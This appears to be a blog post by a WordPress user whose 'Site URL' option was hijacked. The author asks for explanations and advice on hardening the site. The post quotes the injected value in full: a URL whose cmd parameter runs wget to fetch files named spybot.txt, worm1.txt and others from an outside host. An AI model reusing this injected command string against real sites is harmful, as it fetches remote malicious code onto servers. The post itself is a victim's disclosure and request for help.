My blog got hacked?

This morning my blog was displaying without the CSS file. When I investigated, it turned out that somehow the “Site URL” in my options had been changed to the following (line breaks inserted for readability)

https://huminf.uib.no/~jill/wp-login.php?<br>action=https://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;<br>wget%20www.visualcoders.net/spybot.txt;<br>wget%20www.visualcoders.net/worm1.txt;<br>wget%20www.visualcoders.net/php.txt;<br>wget%20www.visualcoders.net/ownz.txt;<br>wget%20www.visualcoders.net

I’m an amateur at PHP but this looks as though each time someone loads my blog, instead of the CSS lots of nasty files called things like spy.gif and worm1.txt are loaded. To my server, though, or to the reader’s machine?
Obviously I changed this back to the way it should be. But what more should I do to increase security?
I can’t find who’s responsible for visualcoders.net, the whois doesn’t give that info (I may be being a bit dull and have gone to the wrong whois thing, its being xmas morning and all). I did file a complaint against them with Google, since they use Google adwords. Dunno if Google’ll terminate their contract but I figured I might as well. I found an empty page in the WordPress wiki related to this, but nothing in the support forums.
Explanations and help in making my blog more secure would be highly appreciated. Thanks!